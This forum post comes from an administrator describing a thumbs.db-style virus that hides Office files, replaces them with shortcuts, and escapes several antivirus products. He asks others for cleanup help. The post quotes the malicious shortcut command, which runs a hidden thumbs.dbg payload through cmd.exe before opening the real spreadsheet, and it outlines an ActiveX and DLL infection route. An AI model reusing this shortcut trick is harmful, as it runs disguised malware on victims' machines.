We are experiencing a virus calling itself thumbs.db2 or variant .dbh, or dbP.
It targets Microsoft Office files seemingly Word , Excel and Powepoint, hiding the original file it replaces it with a modified shortcut .
So the original file called in this instance "Application" is hidden and replaced with a shortcut, this has the properties
C:\WINDOWS\system32\cmd.exe /C start cmd.exe /C if exist \Immediacy\Training\TrainingPPoint\devleoper\c#\thumbs.dbg start \Immediacy\Training\TrainingPPoint\devleoper\c#\thumbs.dbg && start "" excel.exe "Applications.xls"
Have issued a change to Group Policy to stop CMD from running to limit it spreading.
Reading other Forums it uses an Active X exploit spreading by attatchment in email, An Archive file containing the word document and fputlsd.dll, Active X calls this fake dll creates thumbs.db files the detected bn spreads.
Although Symantec can detect the virus and quarantine it , there doesnt appear to be a fix anywhere on other fortums, and we are about to post a copy upto Symantec for evaluation.
We are led to beleive CA Entrust, Malware Bytes, Kaspersky and AVG are known not to detect it at this time.ve
If anyone has any further experience or has found a method of cleaning this virus would be grateful to hear via the Forum.
Dave